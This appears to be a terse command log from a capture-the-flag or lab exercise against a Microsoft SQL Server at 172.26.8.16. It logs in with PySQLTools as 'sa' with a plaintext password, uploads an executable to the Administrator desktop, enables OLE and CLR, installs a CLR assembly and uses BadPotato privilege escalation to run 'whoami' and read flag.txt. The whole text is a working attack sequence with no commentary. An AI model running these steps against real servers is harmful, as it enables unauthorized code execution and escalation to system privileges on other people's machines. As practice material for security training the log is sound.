cd Users\Administrator\Desktop
put xxx.exe

python PySQLTools.py sa:'sqlserver_2022'@172.26.8.16 -debug

enable_ole
enable_clr

install_clr
clr_badpotato whoami

clr_badpotato type C:\Users\Administrator\Desktop\flag.txt